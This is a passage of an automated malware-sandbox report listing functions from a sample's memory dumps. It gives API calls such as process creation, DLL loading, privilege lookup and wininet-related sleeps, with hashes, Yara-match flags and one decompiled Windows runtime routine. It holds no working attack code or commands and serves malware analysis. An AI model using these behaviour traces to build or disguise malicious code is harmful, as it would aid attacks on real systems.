                                                                                                                • Associated: 00000020.00000002.481029509.0000000004DBF000.00000040.00000001.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: InitializeThunk
                                                                                                                • String ID:
                                                                                                                • API String ID: 2994545307-0
                                                                                                                • Opcode ID: 483b1237edd8767ecb3306885f1652b62d3349d1d3b82c2440e466f408df3e53
                                                                                                                • Instruction ID: 34884782a38e085ee578487ef1f5b920d3f6a8f38a0d4ffb48b0fd9c7a3810d3
                                                                                                                • Opcode Fuzzy Hash: 483b1237edd8767ecb3306885f1652b62d3349d1d3b82c2440e466f408df3e53
                                                                                                                • Instruction Fuzzy Hash: C69002B124105416F14071595404746041797D4345F51C411A9055565E8799EDD576A5
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 04D09A50, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000020.00000002.480085974.0000000004CA0000.00000040.00000001.sdmp, Offset: 04CA0000, based on PE: true
                                                                                                                • Associated: 00000020.00000002.480976199.0000000004DBB000.00000040.00000001.sdmp Download File
                                                                                                                • Associated: 00000020.00000002.481029509.0000000004DBF000.00000040.00000001.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: InitializeThunk
                                                                                                                • String ID:
                                                                                                                • API String ID: 2994545307-0
                                                                                                                • Opcode ID: 71fd18e9ee5d94b94b35f12eb6115d4564590c3bd8f6c71217126c0233250f26
                                                                                                                • Instruction ID: 72f1111d646f21b0428373212c12010a72c30dad398ea9ee0036aaac5ae96516
                                                                                                                • Opcode Fuzzy Hash: 71fd18e9ee5d94b94b35f12eb6115d4564590c3bd8f6c71217126c0233250f26
                                                                                                                • Instruction Fuzzy Hash: CA90026125185056F20065695C14B07041797D4347F51C515A4145565CCA55E8A16561
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 02B28C60, Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 90sleepCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • Sleep.KERNELBASE(000007D0), ref: 02B28D08
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000020.00000002.474991330.0000000002B10000.00000040.00000001.sdmp, Offset: 02B10000, based on PE: false
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: Sleep
                                                                                                                • String ID: net.dll$wininet.dll
                                                                                                                • API String ID: 3472027048-1269752229
                                                                                                                • Opcode ID: 75d46330f31279b0b389515d4e73d3f950885ddfc943a3ae23c791d1040870db
                                                                                                                • Instruction ID: ae6024dcf1d18a27e46ca280faa917386e513828f59fb76057e9b4c5e719be05
                                                                                                                • Opcode Fuzzy Hash: 75d46330f31279b0b389515d4e73d3f950885ddfc943a3ae23c791d1040870db
                                                                                                                • Instruction Fuzzy Hash: 293181B6500754BBC724DF64D884FA7B7B8EF48704F00855DE62DAB240DA30B658CFA4
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 02B28C56, Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 83sleepCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • Sleep.KERNELBASE(000007D0), ref: 02B28D08
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000020.00000002.474991330.0000000002B10000.00000040.00000001.sdmp, Offset: 02B10000, based on PE: false
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: Sleep
                                                                                                                • String ID: net.dll$wininet.dll
                                                                                                                • API String ID: 3472027048-1269752229
                                                                                                                • Opcode ID: 3195c31a234877bfc11dcdde17e6fd62dc7fc4c136be14aa30044259d46cc756
                                                                                                                • Instruction ID: 3f6c635aa350a2631e0eb19b4b849e2498c4f4bae9462683b8ff4366b654362f
                                                                                                                • Opcode Fuzzy Hash: 3195c31a234877bfc11dcdde17e6fd62dc7fc4c136be14aa30044259d46cc756
                                                                                                                • Instruction Fuzzy Hash: 7631F2B2900754BFD720DF64D885B6BB7B4EF88704F00809DE62DAB241D770A658CFA5
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 02B2A250, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,02B13AF8), ref: 02B2A27D
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000020.00000002.474991330.0000000002B10000.00000040.00000001.sdmp, Offset: 02B10000, based on PE: false
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: FreeHeap
                                                                                                                • String ID: .z`
                                                                                                                • API String ID: 3298025750-1441809116
                                                                                                                • Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                                                                                • Instruction ID: f27a07230a5fdacb12471cde276f4991c2b160dadc25d420b819b81c976f042a
                                                                                                                • Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                                                                                • Instruction Fuzzy Hash: 7AE012B1200218ABDB18EF99CC48EA777ADAF88750F018598BA085B241C630E914CAB0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 02B2273B, Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 103COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • CoInitialize.OLE32(00000000,00000000,02B13A1A,00000000), ref: 02B22757
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000020.00000002.474991330.0000000002B10000.00000040.00000001.sdmp, Offset: 02B10000, based on PE: false
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: Initialize
                                                                                                                • String ID: @J7<
                                                                                                                • API String ID: 2538663250-2016760708
                                                                                                                • Opcode ID: 61186527520372a68b9117f4239c313e7ac6643c57387857bfc58576791d514c
                                                                                                                • Instruction ID: 6548a73216fe675350e30846c54f29f534be49645aca586743ce8f2e4e7e53f1
                                                                                                                • Opcode Fuzzy Hash: 61186527520372a68b9117f4239c313e7ac6643c57387857bfc58576791d514c
                                                                                                                • Instruction Fuzzy Hash: 25312575A0071A9FDB10DFD8D8809EEB7B9FF88304B104599E919EB214D775EE05CBA0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 02B22740, Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 101COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • CoInitialize.OLE32(00000000,00000000,02B13A1A,00000000), ref: 02B22757
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000020.00000002.474991330.0000000002B10000.00000040.00000001.sdmp, Offset: 02B10000, based on PE: false
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: Initialize
                                                                                                                • String ID: @J7<
                                                                                                                • API String ID: 2538663250-2016760708
                                                                                                                • Opcode ID: a65e89cabccbf1c9574094125ed30e1c2f09492c7af628ccf96ada557c05ecf6
                                                                                                                • Instruction ID: 81441933ad77851da92c95c3479e29445c392919e818f2373e8d1efbe4a5e003
                                                                                                                • Opcode Fuzzy Hash: a65e89cabccbf1c9574094125ed30e1c2f09492c7af628ccf96ada557c05ecf6
                                                                                                                • Instruction Fuzzy Hash: C43123B5A003199FDB00DFD8D8809EEB7B9FF48304B108599E909EB214D775EE05CBA0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 02B182E8, Relevance: 3.1, APIs: 2, Instructions: 59threadwindowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 02B1834A
                                                                                                                • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 02B1836B
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000020.00000002.474991330.0000000002B10000.00000040.00000001.sdmp, Offset: 02B10000, based on PE: false
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: MessagePostThread
                                                                                                                • String ID:
                                                                                                                • API String ID: 1836367815-0
                                                                                                                • Opcode ID: 4f881f6840bbbcfcd8f34173a4b462d9c8560db323d876da099da52f227c33f6
                                                                                                                • Instruction ID: a98bb03590c2c8c5e7a5a6587ab31c31a25decc4c600d61dc82d6b0c174f74c7
                                                                                                                • Opcode Fuzzy Hash: 4f881f6840bbbcfcd8f34173a4b462d9c8560db323d876da099da52f227c33f6
                                                                                                                • Instruction Fuzzy Hash: D8014C31A412287AE721A6949D03FFE7B2DAF41F11F180099FF08FA1C1D69466064BF1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 02B182F0, Relevance: 3.1, APIs: 2, Instructions: 55threadwindowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 02B1834A
                                                                                                                • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 02B1836B
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000020.00000002.474991330.0000000002B10000.00000040.00000001.sdmp, Offset: 02B10000, based on PE: false
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: MessagePostThread
                                                                                                                • String ID:
                                                                                                                • API String ID: 1836367815-0
                                                                                                                • Opcode ID: 227f733d2337f393c9c23a3029a138392d248729cdc1b8215db72b49ff82223c
                                                                                                                • Instruction ID: 04739fe676fdd381391897b37ad013bdd6111bcc89df1a93d4c7acea3772ff04
                                                                                                                • Opcode Fuzzy Hash: 227f733d2337f393c9c23a3029a138392d248729cdc1b8215db72b49ff82223c
                                                                                                                • Instruction Fuzzy Hash: D101A731A403287BE721A6949C02FBE776CAB41F50F554155FF08BA1C1E6947A0A4BF5
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 02B1ACD0, Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 02B1AD42
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000020.00000002.474991330.0000000002B10000.00000040.00000001.sdmp, Offset: 02B10000, based on PE: false
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: Load
                                                                                                                • String ID:
                                                                                                                • API String ID: 2234796835-0
                                                                                                                • Opcode ID: 1c6cec20b9f88e12bdd3a4567b9f8da9e71c9cda0b0e130cedf75b22a9c9a6c7
                                                                                                                • Instruction ID: 81fed9c8d6fdc71daf8654ca32bc30919f38b56ea4fb158c2c47b494741a7e1a
                                                                                                                • Opcode Fuzzy Hash: 1c6cec20b9f88e12bdd3a4567b9f8da9e71c9cda0b0e130cedf75b22a9c9a6c7
                                                                                                                • Instruction Fuzzy Hash: 26011EB5D0020DABDB10EBA4DC41FDEB7799B44308F1041D5E90C97240FA31E758CB91
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 02B2A2BD, Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 02B2A314
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000020.00000002.474991330.0000000002B10000.00000040.00000001.sdmp, Offset: 02B10000, based on PE: false
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: CreateInternalProcess
                                                                                                                • String ID:
                                                                                                                • API String ID: 2186235152-0
                                                                                                                • Opcode ID: 987faa140e664cbe637fd1f32d567042f969e6269e8c0d6cb6861e9667af3fa4
                                                                                                                • Instruction ID: 0f4cc27908920fa6b92c755766b1a08b90785283fceacb4aa6b1b9efc781f159
                                                                                                                • Opcode Fuzzy Hash: 987faa140e664cbe637fd1f32d567042f969e6269e8c0d6cb6861e9667af3fa4
                                                                                                                • Instruction Fuzzy Hash: A201AFB2204108AFCB54CF89DC90EEB77AEAF8C354F158258BA0DE7240C630E851CBA0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 02B2A2C0, Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 02B2A314
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000020.00000002.474991330.0000000002B10000.00000040.00000001.sdmp, Offset: 02B10000, based on PE: false
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: CreateInternalProcess
                                                                                                                • String ID:
                                                                                                                • API String ID: 2186235152-0
                                                                                                                • Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                                                                                • Instruction ID: 79e1a5b7315d6db7abe742b001393423651f9f3d3c0648e4a62ad09b72afabd2
                                                                                                                • Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                                                                                • Instruction Fuzzy Hash: 1301B2B2210208BFCB54DF89DC90EEB77AEAF8C754F158258FA0D97240C630E851CBA4
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 02B2A319, Relevance: 1.5, APIs: 1, Instructions: 37processCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 02B2A314
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000020.00000002.474991330.0000000002B10000.00000040.00000001.sdmp, Offset: 02B10000, based on PE: false
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: CreateInternalProcess
                                                                                                                • String ID:
                                                                                                                • API String ID: 2186235152-0
                                                                                                                • Opcode ID: 1ba99ab6ee253bc7d0c4ac3e51d6ed8285face76754b8a383cb1a2989827d17e
                                                                                                                • Instruction ID: 8025c8e1765716da2494d0f91b6caf31307095ef5757dc3876b08776ceffc9b9
                                                                                                                • Opcode Fuzzy Hash: 1ba99ab6ee253bc7d0c4ac3e51d6ed8285face76754b8a383cb1a2989827d17e
                                                                                                                • Instruction Fuzzy Hash: 4BF0BEB1240364ABC724EB58DC44EE77B9CDF84254F108999F84C57242CA70E818CBE1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 02B28D90, Relevance: 1.5, APIs: 1, Instructions: 36threadCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,02B1F030,?,?,00000000), ref: 02B28DCC
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000020.00000002.474991330.0000000002B10000.00000040.00000001.sdmp, Offset: 02B10000, based on PE: false
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: CreateThread
                                                                                                                • String ID:
                                                                                                                • API String ID: 2422867632-0
                                                                                                                • Opcode ID: 6d22c14480dfcbf0a49ee93e2f1a388e2ab4c86983710b7defaf55aca31f25c0
                                                                                                                • Instruction ID: c5f6be085bbc6d93e0f4ae377fb9832c5796053ba3945174bfcf0e4f3457ec13
                                                                                                                • Opcode Fuzzy Hash: 6d22c14480dfcbf0a49ee93e2f1a388e2ab4c86983710b7defaf55aca31f25c0
                                                                                                                • Instruction Fuzzy Hash: 35E092333913143AE3307599AC02FA7B39DDB91B60F54006AFB0DEB6C0D595F40546A5
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 02B2A3AC, Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • LookupPrivilegeValueW.ADVAPI32(00000000,?,02B1F1B2,02B1F1B2,?,00000000,?,?), ref: 02B2A3E0
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000020.00000002.474991330.0000000002B10000.00000040.00000001.sdmp, Offset: 02B10000, based on PE: false
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: LookupPrivilegeValue
                                                                                                                • String ID:
                                                                                                                • API String ID: 3899507212-0
                                                                                                                • Opcode ID: 886f70b3378241b9eeb88d6aca73c0b28fba179de0a566fa2f8f25dcff1af92c
                                                                                                                • Instruction ID: c530861ffa6eea359e7749df8c2b29b6efc4b95287a5a5cc3d97d67b604054b6
                                                                                                                • Opcode Fuzzy Hash: 886f70b3378241b9eeb88d6aca73c0b28fba179de0a566fa2f8f25dcff1af92c
                                                                                                                • Instruction Fuzzy Hash: 83E092B12002147BDB20DF54CC44EDB77699F85250F008198F90D97241C530A814CBB0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 02B2A210, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • RtlAllocateHeap.NTDLL(02B24516,?,02B24C8F,02B24C8F,?,02B24516,?,?,?,?,?,00000000,00000000,?), ref: 02B2A23D
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000020.00000002.474991330.0000000002B10000.00000040.00000001.sdmp, Offset: 02B10000, based on PE: false
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: AllocateHeap
                                                                                                                • String ID:
                                                                                                                • API String ID: 1279760036-0
                                                                                                                • Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                                                                                                • Instruction ID: bf58535f5f527dc3d428e92553c432f0a8931f4d7c04f64bd52351697b3559c7
                                                                                                                • Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                                                                                                • Instruction Fuzzy Hash: D3E012B1200218ABDB14EF99CC44EA777ADAF88650F118598BA085B241C630F914CAB0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 02B2A3B0, Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • LookupPrivilegeValueW.ADVAPI32(00000000,?,02B1F1B2,02B1F1B2,?,00000000,?,?), ref: 02B2A3E0
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000020.00000002.474991330.0000000002B10000.00000040.00000001.sdmp, Offset: 02B10000, based on PE: false
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: LookupPrivilegeValue
                                                                                                                • String ID:
                                                                                                                • API String ID: 3899507212-0
                                                                                                                • Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                                                                                • Instruction ID: d11a7a4f0b271062a5a9ae9461e0257fc61583c4dd62f37aab77da60b01d8564
                                                                                                                • Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                                                                                • Instruction Fuzzy Hash: 83E01AB12002186BDB10DF49CC84EE777ADAF88650F018154BA0C57241C934E8148BF5
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 02B2A282, Relevance: 1.5, APIs: 1, Instructions: 19memoryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,02B13AF8), ref: 02B2A27D
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000020.00000002.474991330.0000000002B10000.00000040.00000001.sdmp, Offset: 02B10000, based on PE: false
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: FreeHeap
                                                                                                                • String ID:
                                                                                                                • API String ID: 3298025750-0
                                                                                                                • Opcode ID: 80865df76ddddb849f8c1896b1936e17afd15524ebe015052558beddeb27c303
                                                                                                                • Instruction ID: be095a757c6ad27f0b74adb1626a15609b589fdd1f82c3ac3edc6339905d2492
                                                                                                                • Opcode Fuzzy Hash: 80865df76ddddb849f8c1896b1936e17afd15524ebe015052558beddeb27c303
                                                                                                                • Instruction Fuzzy Hash: 44D023712441105BD341DB94DDC44FD7715DF84D35339015ADCEC4E00AC51084474780
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 02B1F6B0, Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • SetErrorMode.KERNELBASE(00008003,?,02B18CF4,?), ref: 02B1F6DB
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000020.00000002.474991330.0000000002B10000.00000040.00000001.sdmp, Offset: 02B10000, based on PE: false
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: ErrorMode
                                                                                                                • String ID:
                                                                                                                • API String ID: 2340568224-0
                                                                                                                • Opcode ID: 7ea49bcfd7eb89cfce1dd1d38e7dcc5e35a49d50de701d0c82c68256bf4518e3
                                                                                                                • Instruction ID: 653a0c93eecea5a7981dbdb81bd79a00c5c44ac975e61ad52cb931d677bdc4bd
                                                                                                                • Opcode Fuzzy Hash: 7ea49bcfd7eb89cfce1dd1d38e7dcc5e35a49d50de701d0c82c68256bf4518e3
                                                                                                                • Instruction Fuzzy Hash: 28D0A7717503043BF610FAA49C03F3732CD9B54B44F4900A4F94CD77C3D950E0008965
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 02B2A243, Relevance: 1.5, APIs: 1, Instructions: 18memoryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • RtlAllocateHeap.NTDLL(02B24516,?,02B24C8F,02B24C8F,?,02B24516,?,?,?,?,?,00000000,00000000,?), ref: 02B2A23D
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000020.00000002.474991330.0000000002B10000.00000040.00000001.sdmp, Offset: 02B10000, based on PE: false
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: AllocateHeap
                                                                                                                • String ID:
                                                                                                                • API String ID: 1279760036-0
                                                                                                                • Opcode ID: 6bcd6b9f690a290d02cc1477972d82007d7c1926bf7f270aecbf26863e814f93
                                                                                                                • Instruction ID: e60b8a1c128efee71227c0802f341ef72e977e8358f1178216c07518bc750ada
                                                                                                                • Opcode Fuzzy Hash: 6bcd6b9f690a290d02cc1477972d82007d7c1926bf7f270aecbf26863e814f93
                                                                                                                • Instruction Fuzzy Hash: 88C012B10611202DE918FB5DB8428F2F35CDB8A215710EAAAE88D4692AD12284694AF3
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 04D0967A, Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000020.00000002.480085974.0000000004CA0000.00000040.00000001.sdmp, Offset: 04CA0000, based on PE: true
                                                                                                                • Associated: 00000020.00000002.480976199.0000000004DBB000.00000040.00000001.sdmp Download File
                                                                                                                • Associated: 00000020.00000002.481029509.0000000004DBF000.00000040.00000001.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: InitializeThunk
                                                                                                                • String ID:
                                                                                                                • API String ID: 2994545307-0
                                                                                                                • Opcode ID: 8d8ba356c55041b8daf824817b7a8ccd038d3e35916132ee17ad6a0c4d9a75b9
                                                                                                                • Instruction ID: 4022963db78a54e5ed28d9dd7975000a0d7acee67e3f258ff3035d193f2f487e
                                                                                                                • Opcode Fuzzy Hash: 8d8ba356c55041b8daf824817b7a8ccd038d3e35916132ee17ad6a0c4d9a75b9
                                                                                                                • Instruction Fuzzy Hash: 65B02BB18010C0C9F700D76006087173D01B7C0300F12C051D1020341B0338E0C0F1B1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Non-executed Functions

                                                                                                                Function 04D5FDDA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 53%
                                                                                                                			E04D5FDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E04D0CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E04D55720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E04D55720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}










                                                                                                                0x04d5fdda
                                                                                                                0x04d5fde2
                                                                                                                0x04d5fde5
                                                                                                                0x04d5fdec
                                                                                                                0x04d5fdfa
                                                                                                                0x04d5fdff
                                                                                                                0x04d5fe0a
                                                                                                                0x04d5fe0f
                                                                                                                0x04d5fe17
                                                                                                                0x04d5fe1e
                                                                                                                0x04d5fe19
                                                                                                                0x04d5fe19
                                                                                                                0x04d5fe19
                                                                                                                0x04d5fe20
                                                                                                                0x04d5fe21
                                                                                                                0x04d5fe22
                                                                                                                0x04d5fe25
                                                                                                                0x04d5fe40

                                                                                                                APIs
                                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 04D5FDFA
                                                                                                                Strings
                                                                                                                • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 04D5FE01
                                                                                                                • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 04D5FE2B
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000020.00000002.480085974.0000000004CA0000.00000040.00000001.sdmp, Offset: 04CA0000, based on PE: true
                                                                                                                • Associated: 00000020.00000002.480976199.0000000004DBB000.00000040.00000001.sdmp Download File
                                                                                                                • Associated: 00000020.00000002.481029509.0000000004DBF000.00000040.00000001.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                                                                                                • API String ID: 885266447-3903918235
                                                                                                                • Opcode ID: 8494689d9d5baed222ba46f4f575372e4d3d40608b4104bb2a90d84dc194bdd5
                                                                                                                • Instruction ID: dfb32b20a6fce79162ae2ca349c4864dbcaeb4f851dad07708f68b77db965aca
                                                                                                                • Opcode Fuzzy Hash: 8494689d9d5baed222ba46f4f575372e4d3d40608b4104bb2a90d84dc194bdd5
                                                                                                                • Instruction Fuzzy Hash: 3DF0F632200201BFEA251A45DC06F63BF5AEB44730F244314FA685A1E1EE62F86096F4
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%